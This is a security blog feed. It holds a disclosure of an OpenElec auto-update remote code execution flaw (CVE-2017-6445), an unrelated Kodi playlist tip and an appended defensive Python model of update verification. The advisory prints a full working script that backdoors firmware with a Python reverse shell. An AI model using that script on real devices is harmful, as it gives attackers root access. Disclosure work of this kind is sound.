OpenElec https://tech.feedyourhead.at/tags/openelec en
OpenElec: Remote Code Execution Vulnerability through Man-In-The-Middle (CVE-2017-6445) https://tech.feedyourhead.at/content/openelec-remote-code-execution-vulnerability-through-man-in-the-middle
<span class="field field--name-title field--type-string field--label-hidden">OpenElec: Remote Code Execution Vulnerability through Man-In-The-Middle (CVE-2017-6445)</span>
<div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item">
<p>During my research into the update mechanisms of open-source software I discovered vulnerabilities in OpenElec.</p>
<h3>Overview</h3>
<ul>
<li>System affected: OpenElec</li>
<li>CVE: CVE-2017-6445</li>
<li>Vulnerable component: auto-update feature</li>
<li>Software version: 6.0.3, 7.0.1</li>
<li>User interaction: reboot required</li>
<li>Impact: remote code execution with root permissions</li>
</ul>
<h3>Product Description</h3>
<p>According to its <a href="http://openelec.tv/">website</a>, "<strong>Open Embedded Linux Entertainment Center (OpenELEC)</strong> is a small Linux based <a href="http://en.wikipedia.org/wiki/Just_enough_operating_system" target="_blank">Just Enough Operating System (JeOS)</a> built from scratch as a platform to turn your computer into a <a href="http://kodi.tv">Kodi</a> media center."</p>
<h3>Vulnerability</h3>
<p>Automatic updates are disabled by default. Once enabled, OpenElec connects to http://update.openelec.tv/updates.php to check whether a newer version is available. If there is one, OpenElec downloads it from http://releases.openelec.tv/&lt;version&gt;.tar (or from any other URL returned by update.openelec.tv).</p>
<p><img alt="openelec-update-schema" data-entity-type="file" data-entity-uuid="15f13d18-13cc-4322-928a-47b63d91e0f6" src="/sites/default/files/inline-images/OpenElec-Update-Schema.png" /></p>
<p>The auto-update feature of OpenElec uses neither encrypted connections nor signed updates. A man-in-the-middle can therefore manipulate the update packages to gain root access remotely.</p>
<p><img alt="openelec-attack" data-entity-type="file" data-entity-uuid="d6818f0c-10bc-400b-b904-46233d12df90" src="/sites/default/files/inline-images/OpenElec-Angriff-Schema_0.png" /></p>
<p>In order to run the downloaded firmware, the OpenElec system has to be rebooted, so user interaction is required at this point.</p>
<h3>Exploit</h3>
<p>The following script downloads an OpenElec firmware image, extracts it, places a reverse shell into the Kodi start script and finally generates a backdoored firmware:</p>
<div class="geshifilter"><pre class="bash geshifilter-bash">
#!/bin/bash

OPENELEC="OpenELEC-RPi2.arm-7.0.1"
DOWNLOADURL="http://releases.openelec.tv/"

TMP="/tmp"

# fetch the genuine release and unpack its squashfs system image
cd $TMP
test -e ${OPENELEC}.tar || wget $DOWNLOADURL/${OPENELEC}.tar
test -d $OPENELEC || tar xvf ${OPENELEC}.tar

test -d $TMP/unpacked || mkdir $TMP/unpacked
cd $TMP/unpacked
test -d $TMP/unpacked/squashfs-root || unsquashfs $TMP/$OPENELEC/target/SYSTEM

# reverse shell that keeps reconnecting to the listener
cat &gt; $TMP/unpacked/squashfs-root/usr/bin/revshell.sh &lt;&lt; EOF
#!/bin/bash

while true
do
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.12.32.15",5000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' &gt; /dev/null 2&gt;&amp;1
done
EOF

chmod 777 $TMP/unpacked/squashfs-root/usr/bin/revshell.sh

# start the reverse shell from the Kodi start script
awk '/trap cleanup TERM/ { print; print "/usr/bin/revshell.sh &amp;"; next }1' $TMP/unpacked/squashfs-root/usr/lib/kodi/kodi.sh &gt; $TMP/unpacked/squashfs-root/usr/lib/kodi/kodievil.sh
mv $TMP/unpacked/squashfs-root/usr/lib/kodi/kodievil.sh $TMP/unpacked/squashfs-root/usr/lib/kodi/kodi.sh
chmod 777 $TMP/unpacked/squashfs-root/usr/lib/kodi/kodi.sh

# rebuild the system image and regenerate the md5 that ships inside the package
mksquashfs squashfs-root/ SYS -noappend -comp gzip

mv SYS $TMP/$OPENELEC/target/SYSTEM
cd $TMP/$OPENELEC
md5sum target/SYSTEM &gt; target/SYSTEM.md5

# package the backdoored release and clean up
cd $TMP
tar cvf $OPENELEC.evil.tar $OPENELEC

test -d $TMP/unpacked &amp;&amp; rm -fr $TMP/unpacked
test -d $OPENELEC &amp;&amp; rm -rf $OPENELEC
</pre></div>
<h3>Mitigation</h3>
<p>Ensure that auto-update is disabled.</p>
<h3>Timeline</h3>
<ul>
<li>This bug was reported on December 03 2016.</li>
<li>Published as a zero-day on March 04 2017 after no reply from OpenElec.</li>
</ul>
<h3>Credits</h3>
<p>CVE-2017-6445 was discovered by Wolfgang Hotwagner (<a href="https://tech.feedyourhead.at/content/openelec-remote-code-execution-vulnerability-through-man-in-the-middle">https://tech.feedyourhead.at/content/openelec-remote-code-execution-vulnerability-through-man-in-the-middle</a>)</p>
</div>
<span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span>
<span class="field field--name-created field--type-created field--label-hidden">Mar 03 2017</span>
Fri, 03 Mar 2017 21:17:42 +0000 Hoti 231 at https://tech.feedyourhead.at
Kodi: Autoplay on start-up..
https://tech.feedyourhead.at/content/kodi-autoplay-start
<span class="field field--name-title field--type-string field--label-hidden">Kodi: Autoplay on start-up..</span>
<div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item">
<p><img alt="" src="http://tech.feedyourhead.at/sites/tech.feedyourhead.at/files/pictures/kodi.png" /></p>
<p>When I get up in the morning I start my Raspberry Pi (with OpenElec installed) and listen to the local radio stations. It would be awesome if my Pi automatically played my favourite station after booting, so I experimented a bit with the Kodi media center.</p>
<p>First I enabled SSH (in the OpenElec settings) and connected via SSH. Then I created an m3u playlist at "/storage/.kodi/userdata/playlists/music/superfly.m3u":</p>
<p>superfly.m3u:</p>
<pre><code>
http://stream01.superfly.fm:8080/live
http://stream01.superfly.fm:8080/live
http://stream01.superfly.fm:8080/live
http://stream01.superfly.fm:8080/live
http://stream01.superfly.fm:8080/live
http://stream01.superfly.fm:8080/live
http://stream01.superfly.fm:8080/live
http://stream01.superfly.fm:8080/live
http://stream01.superfly.fm:8080/live
http://stream01.superfly.fm:8080/live
http://stream01.superfly.fm:8080/live
http://stream01.superfly.fm:8080/live
http://stream01.superfly.fm:8080/live
http://stream01.superfly.fm:8080/live
</code></pre>
<p>I use the same stream entry multiple times: if the network is not up yet at boot time, Kodi simply tries the next entry (and the next, and the next...).</p>
<p>Now I just have to make sure that Kodi plays this playlist after booting:</p>
<p>Under Settings -&gt; Appearance -&gt; Skin -&gt; Settings there is an option "Enable playlist at startup". As soon as you enable it, you can choose a path for the playlist.</p>
</div>
<span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span>
<span class="field field--name-created field--type-created field--label-hidden">Aug 23 2015</span>
Sun, 23 Aug 2015 16:48:19 +0000 Hoti 99 at https://tech.feedyourhead.at
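The CVE-2017-6445 advisory above rests on two facts: the release is fetched over plain HTTP, and the only checksum (target/SYSTEM.md5) travels inside the same archive that the attacker rewrites. The following is an added illustration, not OpenELEC's code: it models that package layout to show why the in-archive md5 accepts a tampered image while a vendor tag verified with a key already on the device rejects it. VENDOR_KEY, the sample images and the HMAC "signature" are constructed stand-ins (a real updater would use an asymmetric signature with only the public key on the device), and the https/hostname check is an assumed hardening.

```python
import hashlib
import hmac
from urllib.parse import urlparse

# Constructed key: held by the vendor; with HMAC the device needs it too,
# which is why a real design uses an asymmetric signature instead.
VENDOR_KEY = b"constructed-vendor-key"


def build_package(system_image: bytes) -> dict:
    """Lay the package out as the tarball is: the image plus an md5 of it."""
    md5 = hashlib.md5(system_image).hexdigest()
    return {"target/SYSTEM": system_image,
            "target/SYSTEM.md5": f"{md5}  target/SYSTEM\n".encode()}


def vendor_tag(system_image: bytes) -> str:
    """Vendor side: authenticate the image before release (signature stand-in)."""
    return hmac.new(VENDOR_KEY, system_image, hashlib.sha256).hexdigest()


def mitm_replace(backdoored_image: bytes) -> dict:
    """What the advisory describes: swap the image and regenerate SYSTEM.md5."""
    return build_package(backdoored_image)


def check_in_archive_md5(package: dict) -> bool:
    """Device side, using only what the archive itself carries."""
    expected = package["target/SYSTEM.md5"].split()[0].decode()
    return hashlib.md5(package["target/SYSTEM"]).hexdigest() == expected


def check_vendor_tag(package: dict, tag: str) -> bool:
    """Device side: a tag the attacker cannot recompute without VENDOR_KEY."""
    return hmac.compare_digest(vendor_tag(package["target/SYSTEM"]), tag)


def download_url_acceptable(url: str) -> bool:
    """Refuse plain-http or off-host release URLs handed out by the update server."""
    u = urlparse(url)
    return u.scheme == "https" and u.hostname == "releases.openelec.tv"


def demo() -> tuple:
    genuine = b"constructed SYSTEM squashfs image"
    tag = vendor_tag(genuine)                       # published with the release
    evil = mitm_replace(b"constructed image with backdoor")
    return (check_in_archive_md5(evil),             # True: md5 is attacker-controlled
            check_vendor_tag(evil, tag),            # False: tampering detected
            check_vendor_tag(build_package(genuine), tag))  # True: genuine passes


if __name__ == "__main__":
    print(demo())
```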